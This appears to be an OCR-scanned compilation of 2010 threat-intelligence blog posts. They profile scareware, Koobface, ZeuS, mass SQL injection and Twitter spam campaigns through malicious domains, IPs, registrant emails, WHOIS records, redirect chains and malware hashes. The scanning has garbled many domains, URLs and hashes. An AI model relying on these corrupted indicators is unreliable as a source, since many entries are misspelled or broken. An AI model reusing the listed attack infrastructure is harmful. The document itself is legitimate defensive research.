descr: +371 20034981 

remarks: abuse-mailbox: piotrek89@gmail.com 
country: LV 

admin-c: TMCD111-RIPE 
tech-c: TMCD111-RIPE 
status: ASSIGNED PA 
mnt-by: AS6851-MNT 
changed: taner@bkc.lv 20100423 
source: RIPE 

role: TMCD Admin Contacts 
address: leriku 67a, Riga, LV-1084 




org: 0RG-TMDA1-RIPE 
e-mail: bkc@bkc.lv 
admin-c: AS1606-RIPE 
admin-c: TP422-RIPE 
tech-c: RF2443-RIPE 
tech-c: IR106-RIPE 
nic-hdl: TMCD111-RIPE 
changed: taner@bkc.lv 20081023 
source: RIPE 


Moreover, the second traffic optimization strategy takes 
place by loading two different subdomains from 

byethost4.com, where another redirection takes place, this 
time loading the bogus mybookface.net - 209.51.195.115 

- Email: hostorgadmin@googlemail.com 
Sample campaign structure: 

- compromised _site.com 

- compromised _site.com/preload.php 

- 91.188.60.126/?q=jzhaf 

- popal.byethost4.com/mlk.php?sub=2 &r=google.com 




- trash, byethostl4. com/tick.php ?sub=l 
&r=google. com 

- cnbutterHy.com/contact.php7uid=2034 - 74.81.93.227 

- simulshop.com/contact.php?uid=2034 - 88.198.177.74 

- www3.smartbestavlO.co.cc - 74.118.194.78 
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Domains involved in the campaign: 

action-force.net 
anytimeopen.com 
atomizer.net 
auto, ideazzz. ru 
a vmarket. com. ua 
baby-car.ru 
babystart.eu 
badlhby.com 
bestseller4you. a t 
butikk. losnaspelet. no 
clubshirts. info 
companions411. biz 


egeoptik.com 
e-life, com. mxl 
eshop. mr-servis. cz 
evage.biz 
eventhorizon. biz 
fiiq.de 

freestyle-shop, ch 
gameartisans. org 
gawex.com.pi 
gct.ro 

geraeusch weiten. de 
ignition lb. info 
imalaya.eu 
indovic.net 
irpen. biz 

jasoncorrick. co. uk 
loja virtual, versameta.pt 
machineinterface. net 
nitmail.com 


olek.co.uk 
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opco.co.ir 

pahomefinance.net 

pcmall.ro 

prozoomhosting.net 
rcchina. com. cn 
reco verinstyie. net 
relogio-de-ponto. com.pt 
rhodiola. com. mx 
shop, ullihome. de 
shopzone.ir 
sink-o-mania.com 
skiep. autorud. pi 
sklepl.vinylove.pl 
snews.com.tw 
soposhin vita tions. com 
stand rite, com 
teofio werbuibs. ro 
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triominos.ru 


webmas.ca 
weseilmac. com 
wireandthe wood, com 
1 class filter, be 
24shopping. ni 
9mama.pl 
apwireless.ca 
bazarnet.com.mx 
bead, shop-in-hk. com 
bicigrino. info 
bridezion.de 
buenapetito.net 
calicompras. com 
candjconsulting. us 
carpcompany. ni 
casacristorey. com.mx 
cheekybra ts. com. a u 
chiri-junior. ni 
corpora te-pc. com 



deesis.com.pl 

derise.ee 

digitalelectronicsolutions.biz 

djlstop.com 

firsa turunlerim. com 

gentian.no 

guihua.com. hk 

hydromasaze. com 

iranagrishop.com 

issanni.net 

• [4] Complete list of the actual URLs involved in the 
campaign 

; [5]Pastebin 

jasoncorrick. co. uk 
klimuszko. net 
krasevka.si 

kundalinibooks. com. a u 
kuub.com 
lanpower.se 
lea thershop. be 



Iudf.net 


marinestores. biz 
microdermals. com 
mingfai.info 
minitar. com. tw 
msproductions. be 
murgiainta vola.it 
mvchorus.org 
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nettohoffnung.de 

paketic.com 

parisa.lt 

pentruacasa.com 
promotechmexico. com.mx 
pursuitsptl. com 
quadroufo.com 
quecumbar. co. uk 
rotas.lt 

sammlereck. info 
sensicacciaepesca. com 



skintwo.biz 


sklep.af.com.pl 
sklep. ka fti. com 
sklep. mago. com.pl 
skleplotniczy. pi 
skriptorium.a t 
smscom.nl 
spine.com.br 
szemuvegkeret. com 
telda ta warehouse, com 
tiouw.nl 

uptowntrellis.co.nz 

viasapia. com. br 

vita-bhv.nl 

widlak-market. com 

wscll2.net 

xfour.es 

yeti.com.pl 

Detection for the sea re ware, and the manual install binary: 



- install.exe - [6]Trojan. FakeAlert. CCS; 

FraudTool. Win32. SecurityTool (v) - Result: 

16/40 (40 %) - MD5: 

3562be54671a1326eeef8bcfc85bd2a 0 

- packupdatel07 2034.exe - [7]Packed. Win32.Krap.an; 
TrojWare. Win32. Trojan. Fake alert.4193280 - Result: 10/41 

(24.4 %) - MD5: 991bba541el872191ec5eb88c7delf30 

Upon execution the sample phones back to: 

update2.protect-helper.com - 95.169.186.25 - Email: 
gkook@checkjemaU. nl 

updatel.free-guard.com - 95.169.186.25 - Email: 
gkook@checkjemaU. nl 

- install.48728.exe - [8]Trojan.FakeAV; 
TrojanDownloader:Win32/Renos.KX - Result: 26/41 (63.42 %) 

- MD5: 15281c3f3faclccdaf43e2b26d32a887 

Upon execution the sample phones back to: 

movieartsworld.com - 216.240.146.119 - Email: 
e\aynecroft@ymai\. com 

firstnationarts.com - 66.96.219.38 (redskeltonarts.com, 
southard_cheryl@yahoo.com) - Email: 

harold 

_ ward@ymail. com 

sportfishingarts.com - 66.199.229.230 
(greenbeearts.com, heiserdenise@ymail.com) - Email: 



roderickno- 


vak@rocketmaU. com 

bestgreatarts.com - 64.191.44.73 ( freesurrealarts.com, 

ghuertas@rocketmail.com) - Email: jeffreyespey@ymail.com 
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spacevisionarts.com - 69.10.35.253 
(picturegraffitoarts.com , ganthony46@rocketmail.com) - 
Email: mosleyja-son@rocketmail. com 

smallspacearts.com - 64.20.35.3 ( dvdvideoarts.com, 

ganthony46@rocketmail.com) - Email: 
mosleyja- 

son@rocketmail. com 

Based on cross-checking across different data sets, 
91.188.60.126 - AS6851, BKCNET "SIA" IZZl is also known to 
have been used by at least 4 other members of the affiliate 
network. Naturally, their "signature" can be seen across 
multiple ASs as well. 

Same scareware affiliate program is seen on the following 
IPs, using a different set of affiliate partners: 

194.8.250.154/news.php?land=20 &affid=12400 - 

AS43134, Donstroy Ltd; Emails: donstroitel@mail.com; go- 

daccs@gmaU. com 

194.8.250.155./ne ws.php ?land=20 &affid=12400 
194.8.250.157/news.php?land=20 &a ffid=42500 



194.8.250.158./ne ws.php ?land=20 &affid=42500 


91.188.60.118/news.php?land=20 &affid=50900 - 

A56851, Sagade Ltd.; Emails: piotrek89@gmail.com; 

91.188.60.124/news.php?land=20 &affid-12800 
91.188.60.126/news.php?land=20 &affid=15600 
91.188.60.146/news.php?land=20 &affid=20102 
91.188.60.147/ne ws.php ?land=20 &a ffid=20102 
91.188.60.147/ne ws.php ?land=20 &a ffid=20102 

91.213.157.165/news.php?land=20 &affid=50900 - 

AS 13618, PE "Satteiecom"; Emails: tt@satteiecom.biz 

77.78.239.71/news.php?\and=20 &affid=12400 - 

AS42560, MAXIMUS-NET-SERVICES; Emails: 
godaccs@gmail. com; bosko@gioba\net. ba 

77.78.239.76/news.php?land=20 &affid=12400 

77.78.239.77/news.php?land=20 &affid=15603 

As for AS6851, BKCNET "SiA" IZZi, the same AS is also seen 
in the following campaigns, find below an excerpt from a 
previous post, emphasizing on the Koobface gang 
connection, in the sense that they're both customers of the 
same cybecrime-friendiy ISP. 

• [9]Spamvertised iTunes Gift Certificates and CV 
Themed Malware Campaigns 

• [lOJGoDaddy's Mass WordPress Blogs Compromise 
Serving Scareware 



• [11 JDissecting the Mass DreamHost Sites 
Compromise 

What's so special about [12]AS6851, BKCNET "SIA " IZZI 
anyway? It's the Koobface gang connection in the face of 

uro- 

dinam.net, which is also hosted within AS6851, currently 
responding to 91.188.59.10. More details on 

urodinam.net: 

• [13]Koobface Botnet's Scareware Business Model 

• [14]Koobface Botnet's Scareware Business Model - 
Part Two 

Moreover, on the exact same IP where Koobface gang's 
urodinam.net is parked, we also have the currently active 

Izabslwvn538n4i5tcjl.com - Email: 

michaeitycoon@gmaii.com, serving client side exploits using 
the Yes Malware Exploitation kit - 91.188.59.10 
/temp/cache/PDF.php; admin panel at: 

Izabsiwvn538n4i5tcji. com 

/temp/admin/index.php 
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For the time being, the following domains, IPs are all active 
within AS6851, BKCNET "SIA" IZZI: 

Izabslwvn538n4i5tcjl.com - 91.188.59.10 - Email: 
michae\tycoon@gmaU. com 


hotxxxtubevideo.com - 91.188.59.74 


ruexpl.ru - Email: krahil@mail.ru 

hotxtube.in - 91.188.59.74 - Email: lordjok@gmail.com 

get-money-now.net - 91.188.59.211 - Email: 
noxim@maidsf. ru 

easy-ns-server.org - 91.188.60.3 - Email: 
russetil 985@hotmail. com 

fast-scanerr-online.org - 91.188.60.3 - Email: 
roberson@hotmail. com 

my-antivirusplus.org - 91.188.60.3 - Email: 
FranciscoPGeorge@hotmaii. com 

myprotectonline.org - 91.188.60.3 - Email: 
FranciscoPGeorge@hotmaU. com 

sys-protect-online.org - 91.188.60.3 - Email: 
FranciscoPGeorge@hotmail. com 

av-scaner-onlinemachine.com - 91.188.60.3 - Email: 
gershatv07@gmail.com 

domen-zaibisya.com - 91.188.59.211 - Email: 
security2guard@gmail. com 

directupdate.info - 91.188.60.10 - Email: 

Michael BCarlson@gmail. com 

91.188.59.50 

91.188.60.3 

91.188.59.112 
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Name servers of notice: 


nsl.iillOoilO.com - 91.188.59.70 
ns2.iill0oil0.com - 91.188.59.71 
Domains using their services: 
allforiili.com - Email: iordjok@gmaii.com 
allforyouplus.net - Email: leshapopovi@gmail.com 
alltubeforfree.com - Email: lordjok@gmail.com 
ailxtubevids.net - Email: lordjok@gmail.com 
down loadfree now. in - Email: lordjok@gmail.com 
enterilllisec.in - Email: leshapopovi@gmail.com 
freeanaisextubemovies.com - Email: lordjok@gmail.com 
freetube06.com - Email: lordjok@gmail.com 
freeviewgogo.com - Email: leshapopovi@gmail.com 
homeamateurclips.com - Email: lordjok@gmail.com 
hotfilesfordo wnload. com 
hotxtube.in - Email: lordjok@gmail.com 
porntube2000.com - Email: welolseeees@gmail.com 
porntubefast.com - Email: welolseeees@gmail.com 
porn-tube-video.com - Email: weiolseeees@gmail.com 


skachivay. com 

visiocariill.net - Email: leshapopovi@gmail.com 

xhuilillii.com - Email: iordjok@gmail.com 

yourbestway.cn - Email: haucheng@yahoo.com 

youvideoxxx.com - Email: jonnytrade@gmail.com 

Take down actions are in place, meanwhile, consider going 
through the "[15]Ultimate Guide to Scareware 

Protection". 
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This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17Jon Twitter. 
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Facebook Photo Album Themed Malware Campaign, 
Mass SQL Injection Attacks Courtesy of AS42560 

(2010-06-15 16:05) 

A spamvertised through Facebook personal messages, Photo 
Album themed campaign, with the domain IP respond¬ 
ing to ZeuS C &Cs, combined with an indirect connection 
between this campaign and the '[1]100,000+ Scareware 
Serving Fake YouTube Pages Campaign ", followed by a 
domain portfolio used in a currently active mass SQL 
injection attack serving CVE-2007-5659 exploits, parked 
within the same AS as the Facebook's campaign itself. 

What else is missing? The details of course. 

DM spamvertised URL: online-photo-albums.org - 

77.78.239.4, AS42560, BA-GLOBALNET-AS - Email: 

pro- 

tect@privacy. com. ua 

Detection rate: album.exe - [2]Win32.DownloaderReno; 
Backdoor.Win32.Kbot.anj - Result: 12/41 (29.27 %) 

MD5: d24aa2c364d4b86f75a09362c952a838 

SHA1: 3973c547b64dl66ae807eec494c373efd53ac04c 

Creates l.exe; 2.exe and the self-destructing 3.exe. 
Detection rates: 

- l.exe - [3]Result: 0/41 (0.00 %) 


MD5: fbd0a495d3409123d0e90a9a 734cbbcl 
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SHA1: Ce527267f50b433c622e5da0db5515a4d2e4ae9c 

- 2.exe - [4]Win32.Down\oaderReno; Sus/UnkPacker - Result: 
10/41 (24.39 %) 

MD5: 7a4feaf8d9acf982d0cbeb437e4f7c3d 

SHA1: 39b280d0d2ec505a94415f7a9468a547fee51c66 

with 3.exe phoning back to the following domain, also 
responding to the original campaign's IP 77.78.239.4 

spmfb3309.com /ab/setup.php?act=filters 
&id=BWKJDONWLt3pn2Vh6YlhhBe3 &ver=2 

inetnum: 77.78.239.0 - 77.78.240.255 

netname: MAXIMUS-NET-SERVICES 

remarks: # # # in case of abuse please contact: 

godaccs@gmail.com # # # 

descr: Maximus hosting services 

country: MD 

admin-c: JB1004 

tech-c: JB1004 

status: ASSIGNED PA 

mnt-by: BA-GLOBALNET 

changed: bosko@globalnet.ba 20100528 



source: RIPE 


person: Jerkovic Bosko 

address: Josipa Vancasa 10 

address: 71000 Sarajevo 

address: Bosnia and Herzegovina 

phone: +387 33 221093 

e-mail: bosko@globalnet.ba 

nic-hdl: JB1004 

mnt-by: BA-GLOBALNET 

changed: bosko@globalnet.ba 20070309 

source: RIPE 

Surprise, surprise, where do we know that 
godaccs@gmail.com abuse email from? From the 
previously pro¬ 
filed "[. 5]Dissecting the 100,000+ Scareware Serving 
Fake YouTube Pages Campaign". In particular: 

-AS43134, Donstroy Ltd; Emails: donstroitel@mail.com; 

godaccs@gmail. com 

- AS42560, MAXIMUS-NET-SERVICES; Emails: 

godaccs@gmail. com 

Responding to 77.78.239.4 (online-photo-albums.org) 

are also the following domains: 



hyporesist.com - Email: Kyle.MoodyAI@yahoo.com - Used 

to register ever52592g.com; miror-counter.org; mn- 
frekjivr.com 

newsbosnia.org - Email: qggrvpvwiw@whoisservices.cn - 

[6]ZeuS crimeware C &C 

online-photo-albums.org - Email: protect@privacy.com.ua 

search-static.org - Email: Kyle.MoodyAI@yahoo.com 

spmfb2299.com - Email: iaycxpqguk@whoisservices.cn 

spmfb3309.com - Email: qhyfafvqyh@whoisservices.cn 

vostokgear.org - Email: afgjvubuym@whoisservices.cn 

Where's the mass SQL injection attack connection? Within 
AS42560, responding to 77.78.239.56 are also the 

following domains, part of the campaign: 
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google-server09.info - Email: kit00066@gmail.com 
google-serverlO.info - Email: kit00066@gmail.com 
google-serverll.info - Email: kit00066@gmail.com 
google-serverl2.info - Email: kit00066@gmail.com 
google-serverl4.info - Email: kit00066@gmail.com 
google-server29.info - Email: kit00066@gmail.com 
google-server31.info - Email: kit00066@gmail.com 


jhuiuhxfgxhlfkjhjth.info - Email: kit00066@gmail.com 
jhuiuhxfgxhtfkjhjth.info - Email: kit00066@gmaii.com 
jhuiuhxfgxhlfkjhjth.info - Email: kit00066@gmail.com 
top-teen-porn.info - Email: kit00066@gmail.com 
Sample mass injection URLs: 
google-server09. info/ urchin.js 
google-serverl 0. info/ urchin.js 
google-serverl 1. info/ urchin.js 
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google-serverl2.info/ urchin.js 
googie-serverl4.info/ urchin.js 
google-server29. info/ urchin.js 
google-server31. info/ urchin.js 
jhuiuhxfgxhlfkjhjth. info/ urchin.js 
jhuiuhxfgxhtfkjhjth.info/ urchin.js 
jhuiuhxfgxhlfkjhjth.info/ urchin.js 
Detection rate: 

- urchin.js - [7]Trojan.JS.Redirector.ca (v); JS:Down\oader-LP - 
Result: 4/41 (9.76 %) 

MD5: 3f2bc50c30ed8e 799 7b3de3d528d0ed5 



SHA1: 66d6edef711516201f20fce676175adl 6777el 62 


Sample exploitation structure from the mass SQL injection 
campaign: 

- google-server31.info /urchin.js 

- Seanner-Album.com/7affid=382 &subid=landing - 

91.212.127.19\ AS49087, Telos-Solutions-AS - Email: 
systemman _mk@gmail.com 

- websitecoolgo.com/cgi-bin/158 - 91.188.59.220 - 
AS6851, BKCNET "SiA" iZZi - Email: 

marcomar- 

cian@hotmailbox. com 

- websitecooigo.com /cgi-bin/random content leading to 
CVE-2007-5659 
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Parked on 91.212.127.19 (Scanner-Album.com), 

AS49087, Telos-Solutions-AS: 

automaticsecurityscan.com - Email: 
robertwatkins@hotmailbox. com 

bigsecurityscan.com - Email: 
robertwatkins@hotmailbox. com 

bigsecurityscan.com - Email: 
robertwatkins@hotmailbox. com 

biacksecurityscan.com - Email: 
robertwatkins@hotmailbox. com 


edscorpor.com - Email: leonschmura@hotmailbox.com 
edsctrum.com - Email: admin@edsfiles.com 
edsfiles.com - Email: leonschmura@hotmailbox.com 
edsfilles.com - Email: leonschmura@hotmailbox.com 
edsletter.com - Email: leonschmura@hotmailbox.com 
edslgored.com - Email: leonschmura@hotmailbox.com 
edsnewter.com - Email: leonschmura@hotmailbox.com 
edsogos.com - Email: leonschmura@hotmailbox.com 
edsspectr.com - Email: leonschmura@hotmailbox.com 
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edstoox.com - Email: leonschmura@hotmailbox.com 

findsecurityscan.com - Email: 
robertwatkins@hotmaiibox. com 

memory-scanner.com - Email: systemman 
_mk@gmail. com 

onefindup.org - Email: JamesHying@xhotmail.net 

scanner-album.com - Email: systemman _mk@gmail.com 

scanner-definition.com - Email: rutkowski 
_m3@gmail. com 

scanner-hardware.com - Email: systemman 
_mk@gmail. com 


scanner-master.com - Email: systemman_mk@gmail.com 

scanner-models.com - Email: systemman _mk@gmail.com 

scanner-profile.com - Email: systemman _mk@gmail.com 

scanner-programming.com - Email: systemman 
_mk@gmail. com 

scanner-suppiies.com - Email: rutkowski_m3@gmail.com 
scanner-tips.com - Email: systemman _mk@gmail.com 
searchdubles.org - Email: MerleMeisin@xhotmail.net 
searchmartiup.org - Email: MerleMeisin@xhotmail.net 
searchprasup.org - Email: MerleMeisin@xhotmail.net 
searchprodinc.org - Email: MerleMeisin@xhotmail.net 
searchprodinc.org - Email: MerleMeisin@xhotmail.net 
searchtanup.org - Email: MerleMeisin@xhotmail.net 
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Responding to 91.188.59.220 and 91.188.59.221 
(websitecoolgo.com) within AS6851, BKCNET "SIA" IZZI are 
also the following domains participation in different 
campaigns: 

internetgotours.com - Email: 
marcomarcian@hotmailbox. com 

mediaboomgo.com - Email: paulalameda@hotmailbox.com 


mediagotech.com - Email: marcomarcian@hotmailbox.com 

mediaracinggo.com - Email: 
paulalameda@hotmailbox. com 

netgozero.com - Email: marcomarcian@hotmaiibox.com 

nethealthcarego.com - Email: 
marcomarcian@hotmailbox. com 

networkget.com - Email: marcomarcian@hotmailbox.com 

networksportsgo.com - Email: 
marcomarcian@hotmailbox. com 

patricknetgo.com - Email: paulalameda@hotmailbox.com 

webaliveget.com - Email: paulalameda@hotmailbox.com 

webcoolgo.com - Email: paulalameda@hotmailbox.com 

webgettraffic.com - Email: paulalameda@hotmailbox.com 

webgetwisdom.com - Email: 
marcomarcian@hotmaiibox. com 

webgetwise.com - Email: marcomarcian@hotmailbox.com 

webgoengine.com - Email: paulalameda@hotmailbox.com 

webgosoiutions.com - Email: 
paulalameda@hotmailbox. com 

webmagicgo.com - Email: paulalameda@hotmailbox.com 

websitecoolgo.com - Email: 
marcomarcian@hotmailbox. com 

websiteget.com - Email: marcomarcian@hotmailbox.com 



The rise of [8]custom abuse emails, conveniently offered 
to cybercrime-friendly dedicated customers? 

It's worth pointing out that godaccs@gmail.com a.k.a 
CompUfe, Ltd is conveniently responsible for- AS42560, BA- 
GL0BALNET-A5; A543134, Donstroy Ltd; and AS42560, 
MAXIMUS-NET-SERVICES, followed by 

piotrek89@gmaii.com responsible for [9JAS6851, 

BKCNET "SIA" IZZI (used by the Koobface gang, also seen 
in the following campaigns 517 

[lOJSpamvertised iTunes Gift Certificates and CV 
Themed Malware Campaigns; [11 JGoDaddy's Mass 
WordPress Blogs Compromise Serving Scareware). 

This post has been reproduced from [12]Dancho 
Danchev's blog. Follow him [13]on Twitter. 

1. htto://ddanchev.bio os oot.com/2010/06/dissectina-l00000- 
scareware-servina.html 

2 . 

http://www. virustotal. com/analisis/2ace318127ee5b49b44df3 

1561928a 75022f258a53e521 ab4c4abl2 791 ec66b3-l2 766 

04208 

3. 

http://www. virustotal. com/analisis/bfe5alb7a6aaf0a931 ca07 

65 fl 49cdl dc26f3f85ac6163dbde0 75 78602febb70-12 766 

05051 


4 . 













htto: //www. virustotal. Com/analisis/4e6bc0e52d3ef88e0db7fl 

Qd0cb6219caea7b313 b7fe50282d43dc6d6cd61d70-12 766 

05058 

5. http.V/ddanchev.blo as oot.com/2010/06/dissectina-l 00000- 
scareware-servina.html 

6. httos://zeustracker. abuse, ch/monitor. oho ? 
i paddress=77.78.239.4 

7. 

http://www.virustotal.com/analisis/ff387ec39afa68aabfad3f3f 

d622ceaca4f58e837f5a6fbd568fcefc5cfdde32-12766 

07425 

8. http .-//twitter, com/danchodanchev/status/6549021186 

9. http://ddanchev.bio os pot.com/2010/06/dissectina-l00000- 
scareware-servina.html 

10. htto://ddanchev.blo as oot. com/2010/05/soamvertised- 
itunes-aift-certifica tes. h tmi 

11. htto://ddanchev.blo as oot. com/2010/04/aodaddvs-mass- 
wordoress-bloas.html 

12. htto://ddanchev.blo as oot. com/ 

13. htto://twitter.com/danchodanchev 
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Dissecting the Exploits/Scareware Serving Twitter 
Spam Campaign (2010-06-16 14:32) 

[ 1 JYesterday's expioits-serving campaign spreading 
across Twitter, using automatically registered accounts 
"ping-ing" random Twitter users with links to the campaign, 
is worth profiting due to its state of maliciousness - if the end 
user is exploitable, exploits are served ultimately leading to 
sea re ware, and if he isn't, the cybercriminals behind it 

[2]attempt to monetize through the same network 
used by the [3]Koobface gang on Mac OS X hosts - 
zmi.com. 

Let's dissect the campaign, and once again emphasize on 
the fact just how small the cybercrime ecosystem 

could be, given enough historical data is gathered on who's 
who, who's what, and what's when. 

Sample exploitation structure: 

- qtoday.info /ttds/doit.php?ckey=12 &schema=l 
&f=wF - 94.228.209.73 (AS47869), 75.125.222.242 
(AS21844) 

- qtoday.info /ttds/jump.php 

- fqsmydkvsffz.com /tre/vena.html/RANDOM - 

69.174.242.21 (AS13768); 75.125.222.242 (AS21844) 
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The sea reware installed interacts with AS18866: 

69.50.197.241 /up/el.dat 
69.50.197.241 7up7e2.dat 



69.50.197.241 /data/upd6.dat 

69.50.197.241 /data/upd7.dat 

69.50.197.241 /data/updl.dat 

69.50.197.241 /data/upd2.dat 

Responding to 69.50.197.241 (AS18866) are: 

radarixo.com - Email: moldavimo@safe-mail.net - 

[4]profiled here 

cyberduck.ru - Email: samm _87@email.com - [5]profiled 
here 

livejasment.com - Email: moldavimo@safe-mail.net 

linksandz.com - Email: moldavimo@safe-mail.net - 

[6]profiled here 

Detection rates: 

- el.dat -11 on 17 (65 %) - [7]Trojan.MulDropl.21645; 
Win32/Lukicse\. P 

MD5 hash: 2566clla9cd2226b59d226e76bae9f64 
SHA1 hash: 6alfd405f547ed33f7cfe3abad4f423a33c0e281 

- e2.dat - 8 on 17 (47 %) - [8]W32/Witkinat.A.gen.'Eldorado; 
Win32/Witkinat. R 

MD5 hash: 8daaa96ba059e6bld5108c314fl60175 

SHA1 hash: 

b43d2 6bb2583d905 7cb343cl 0d5db 79c846ed895 



- updl.dat -11 on 17 (65 %) - [9]TR/Lukicsel.EB; 
Trojan. Win32. Delf. aaxw A 

MD5 hash: 7b2534536cdfl68f50d63845bl3af8ba 


SHA1 hash: 

306f5199c3f91 cd28c634914a64 78bcbc5c4e9c0 

- upd2.dat -11 on 17 (65 %) - [10]TR/Lukicsel.EB; 

Trojan. Win32. Delf. aaxw A 

MD5 hash: 323ala2429467b3891cc20a26b82f851 

SHA1 hash: 

ae3fe6b442521d95631703ab530213e897e4f8ea 

- upd6.dat - 9 on 17 (53 %) - [ll]Win32/Lukicsel.P; Trojan- 
Dropper. Win32. Delf. frm 

MD5 hash: d05d89bdadd8a23c2ceb0b016d49550a 

SHA1 hash: 

366db3c2cd64a57587376b416c42960adl f28ea3 

- upd7.dat -11 on 17 (65 %) - [12]SHeur3.AAEI; Trojan- 
Dropper. Win32. Delf.frq 

MD5 hash: Ia582b50d82fb57bec036el962e5da2e 

SHA1 hash: 

15a9540927f64dec23e625el40dfde7ce3d23df7 
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The rest of the expioits-serving domains portfolio parked at 

69.174.242.21 (AS13768); 75.125.222.242 (A521844): 
danenskgela.com - Email: strohmeiera@yahoo.com 


aghoxekaoxk.com - Email: tavsadr5r5@yahoo.com 

xfgswsoxoxk.com - Email: tavsadr5r5@yahoo.com 

directinmixem.com - Email: strohmeiera@yahoo.com 

carsmazda6.in - Email: valeriyku@gmail.com 

danenskgela.com - Email: strohmeiera@yahoo.com 

tfyxffnacsc.com - Email: edb.ri871@gmail.com 

sfkemiymeywk.com - Email: 
admin@overseedomainmanagement.com 

aghoxekaoxk.com - Email: tavsadr5r5@yahoo.com 

aghtdkpaoxk.com - Email: skdhdjfg7s@yahoo.com 

aghtdqpaoxk.com - Email: njgf555dfdsa@yahoo.com 

dhjftzbdoxk.com - Email: skdhdjfg7s@yahoo.com 

dbcyjnudoxk.com - Email: njgf555dfdsa@yahoo.com 

mcduimqmoxk.com - Email: fresadmsn7y@yahoo.com 

piamlzjpoxk.com - Email: fresadmsn7y@yahoo.com 

pfgswlopoxk.com - Email: 7uwy7letel@yahoo.com 

qjigaicqoxk.com - Email: 7uwy7letel@yahoo.com 

directinmixem.com - Email: strohmeiera@yahoo.com 

etyet.com - Email: zubakova2@rambier.ru 

grantgarant.com - Email: naumann _heikens@yahoo.it 



carsmazda6.in - Email: valeriyku@gmail.com 
civichonda.in - Email: valeriyku@gmail.com 
drotalflow.in - Email: johns2249@googlemail.com 
carsinfinity.in - Email: valeriyku@gmail.com 
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3m70.cn - Email: abuseemaildhcp@gmail.com - [13]money 
mule registrations, [14]rubbing shoulders with 
[15]Koobface 

m ueypflglvlx. com 

mbhcnjyyykpr. com 

ozkifomzaaqd. com 

dqcnefigaefg. com 

vtmxg wnpjvib.com 

jcfkprwasnaj. com 

qg wyinsxlox. com 

tsusiwpmzuqz. com 

fqsmydkvsffz. com 

qcell.info 

q-fe ver. info vmspl. in 


keirun.in 


iscobar.in 


I oncer, in 

jcfkprwasnaj. com 

The complete list of automatically registered bogus Twitter 
accounts, now suspended: 

twitter. com/AbbottMarleneCY 

twitter. com/AnsonJamesJs 

twitter. com/BandaPau!51 

twitter. com/BarkleyTracy52 

twitter. com/BoserJames 74 

twitter. com/Bradley Sheila Tt 

twitter. com/Bra vo Martin UT 

twitter. com/Bro wnTammyaM 

twitter. com/BurlingameS tek2 

twitter. com/Burton Pa uliC 
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twitter. com/Callo wayEileemb 
twitter. com/CardiHoLilli8l 
twitter. com/CareyJocelynXY 


twitter. com/CarpenterJameCl 
twitter. com/CarterErnieBj 
twitter. com/CarterNanGM 
twitter.com/CharltonRoberl Y 
twitter. com/ClausenJillRC 
twitter. com/CochranLindajB 
twitter. com/CruzSha wnjl 
twitter. com/DanielClin tonqO 
twitter. com/DeanL uigiJB 
twitter. com/DeleonChristiDb 
twitter. com/DickensRitaS 6 
twitter. com/EllisonCortezCC 
twitter. com/FernandezRobekc 
twitter. com/FieldsRichardrx 
twitter. com/FryePhilipAx 
twitter. com/GarrisonMiltoP9 
twitter. com/Gil fordSarahqo 
twitter. com/GilleyJennifeS T 
twitter. com/GiordanoHelenxy 
twitter. com/GishCharlesCy 



twitter. com/CreenDonaldbt 
twitter. com/GriffinRay5 v 
twitter. com/GuzmanEloise5u 
twitter. com/HakaiaS te ve9e 
twitter. com/HammonsLeonarW3 
twitter. com/HarmonRaymondMH 
twitter. com/HartHea therS 0 
twitter. com/HaynesChariesxo 
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twitter. com/HendricksonKi6F 
twitter. com/JonesAndre wUG 
twitter. com/JonesNickolas Yx 
twitter.com/KendallNorma WS 
twitter. com/KroegerAngeliuO 
twitter. com/L eeJerroldRk 
twitter. com/L e vittKe vin9e 
twitter. com/LewisMaryL 8 
twitter. com/LimonMargaretgn 
twitter. com/MarvelThomasa O 
twitter. com/McbeeMelissabu 



twitter. com/MillerFrances we 
twitter. com/MitchellDeborvI 
twitter. com/MooreJoanut 
twitter. com/MorrisMary2n 
twitter. com/MorrisonJackOs 
twitter. com/NealReginaldbH 
twitter. com/NickellGloriad8 
twitter. com/PhelpsRichardKL 
twitter. com/Pitts Tommyyy 
twitter. com/PlummerA thena wn 
twitter. com/Po wellMarie94 
twitter. com/PradoDonaldG8 
twitter. com/RealeBernicegR 
twitter. com/Reese VeronicaFx 
twitter. com/Rie vesShirieyYv 
twitter. com/RobinsonAprilri 
twitter. com/RobinsonLisa8e 
twitter. com/RoblesRicardo Wh 
twitter. com/RubioLanaj9 
twitter, co m/S a vardA n thonyo U 



twitter. com/Sayers WendellVc 
twitter. com/SchmidtLynnk7 
twitter. com/ShankleKa thleor 
twitter. com/S ie versDarleelD 
twitter. com/SmithCeorgieMq 
twitter. com/S teinAshieyuQ 
twitter. com/S toughKelseyqt 
twitter. com/TrejoLisa OO 
twitter. com/TuiiosHo ward Co 
twitter. com/WeberS te ven 6r 
twitter. com/WhiteMichelle vj 
twitter. com/WilkinsonPa ulTd 
twitter. com/WillettErnestCR 
twitter. com/WilliamsMichaBl 
twitter. com/Woods ThelmayO 
twitter. com/WynnRichard4m 
twitter. com/Yo ungMeianieSZ 
twitter. com/CooieyFrancescC 
twitter. com/SchneiderKim 6h 
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twitter. com/DobsonElsiequ 
twitter. com/PeelLouise9q 
twitter. com/White Yolanda OP 
twitter.com/FrostAngeloY2 
twitter. com/MorrisMary2n 
twitter. com/MiiierMaryxl 

PDF exploits, binaries streaming from the domain 
portfolio at 69.174.242.21 (A513768); 75.125.222.242 

(AS21844): 

MD5: 5d42bb346601ba456b52edd3c3e59dlb 
MD5: bal9c971 edefffb22d44e43a91a7d9a9 
MD5: e7a354f58bfe21 c815ddb8faf00bd08c 
MD5: 4al3b96dd056c0075c553588f0211 c44 
MD5: 29e71 e291 a31 ea8fl cddbf7d96f7de86 
MD5: 29e71 e291 a31 ea8fl cddbf7d96f7de86 
MD5: 3bb6bdaf8d4e2822da86ef9a614a04ea 
MD5: f41470c7b9ad2260625d2a62b6dbl58f 
MD5: 3987c92c20c3fl 7b5892f84069d816dl 
MD5: 87a95ec041b2432727336f0cdeeel23a 


MD5: 5d497el841 f5627a 1 b77dbc336da 1594 



MD5: 5balaafcef9ea7516flae7082424e83d 


MD5: 5268f85902c7064b393bbbb3dbc094f9 

SHA1 : 79526ca9579420cb4 6cl 5fe94b282868cl e 7fbbd 

SHA1: f70f6a9aa0aa092511894f7c89defc64637504a 1 

SHA1: 5175b38dfca3dc7dd6ad56bed34a543fl4702bea 

SHA 1 : 2f2c88e0b950cd91 adle49be73e885b07f401 f68 

